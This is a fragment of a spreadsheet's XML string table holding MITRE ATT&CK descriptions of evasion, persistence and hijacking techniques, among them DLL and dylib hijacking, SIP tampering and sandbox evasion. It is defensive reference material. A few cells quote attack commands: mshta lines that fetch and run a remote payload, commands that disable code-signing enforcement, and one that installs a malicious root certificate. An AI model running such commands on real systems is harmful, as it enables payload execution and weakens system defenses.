    <t>Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with &lt;code&gt;@rpath&lt;/code&gt;, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the &lt;code&gt;LC_LOAD_WEAK_DYLIB&lt;/code&gt; function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the &lt;code&gt;FailureCommand&lt;/code&gt; key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)
The &lt;code&gt;Performance&lt;/code&gt; key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the &lt;code&gt;Performance&lt;/code&gt; key is not already present and if an adversary-controlled user has the &lt;code&gt;Create Subkey&lt;/code&gt; permission, adversaries may create the &lt;code&gt;Performance&lt;/code&gt; key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)
Adversaries may also add the &lt;code&gt;Parameters&lt;/code&gt; key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll&lt;/code&gt;.(Citation: malware_hides_service)</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service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t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument &lt;code&gt;net user&lt;/code&gt;. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then &lt;code&gt;cmd.exe /C net user&lt;/code&gt; will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)</t>
  </si>
  <si>
    <t>Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode)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  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}&lt;/code&gt; that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}&lt;/code&gt; that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the &lt;code&gt;DLL&lt;/code&gt; and &lt;code&gt;Function&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}&lt;/code&gt; that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named &lt;code&gt;Zone.Identifier&lt;/code&gt; with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)</t>
  </si>
  <si>
    <t>Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia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credentials.(Citation: Operation Emmental)
Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)
Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)
In macOS, the Ay MaMi malware uses &lt;code&gt;/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert&lt;/code&gt; to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)</t>
  </si>
  <si>
    <t>Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:
1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)
2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.
3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.
4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.
Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)
Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. 
Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)
Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt; on Windows and &lt;code&gt;csrutil disable&lt;/code&gt; on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)
To gain access to kernel memory to modify variables related to signature checks, such as modifying &lt;code&gt;g_CiOptions&lt;/code&gt; to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)</t>
  </si>
  <si>
    <t>Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) 
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))&lt;/code&gt;
They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)</t>
  </si>
  <si>
    <t>Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)
Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) 
Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational&lt;/code&gt; may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) 
On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)
In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.
Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)
Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. 
Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.
For example, on Windows if an adversary places a malicious program named "net.exe" in `C:\example path`, which by default precedes `C:\Windows\system32\net.exe` in the PATH environment variable, when "net" is executed from the command-line the `C:\example path` will be called instead of the system's legitimate executable at `C:\Windows\system32\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: ExpressVPN PATH env Windows 2021)
Adversaries may also directly modify the $PATH variable specifying the directories to be searched.  An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)</t>
  </si>
  <si>
    <t>Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)
Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity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environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.</t>
  </si>
  <si>
    <t>Adversaries may employ various system checks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
Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. 
Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. 
Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. 
Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may employ various user activity checks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
Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) </t>
  </si>
  <si>
    <t>Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)
Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)
Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)</t>
  </si>
  <si>
    <t xml:space="preserve">Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud or be hybrid joined between on-premises systems and the cloud through federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments.
An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. 
Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods. 
</t>
  </si>
  <si>
    <t>Adversaries may abuse the &lt;code&gt;KernelCallbackTable&lt;/code&gt; of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once &lt;code&gt;user32.dll&lt;/code&gt; is loaded.(Citation: Windows Process Injection KernelCallbackTable)
An adversary may hijack the execution flow of a process using the &lt;code&gt;KernelCallbackTable&lt;/code&gt; by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.
A pointer to the memory address of the &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be obtained by locating the PEB (ex: via a call to the &lt;code&gt;NtQueryInformationProcess()&lt;/code&gt; [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be duplicated, and a function in the table (e.g., &lt;code&gt;fnCOPYDATA&lt;/code&gt;) set to the address of a malicious payload (ex: via &lt;code&gt;WriteProcessMemory()&lt;/code&gt;). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)
The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the &lt;code&gt;KernelCallbackTable&lt;/code&gt; may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the &lt;code&gt;KernelCallbackTable&lt;/code&gt; to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. 
TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
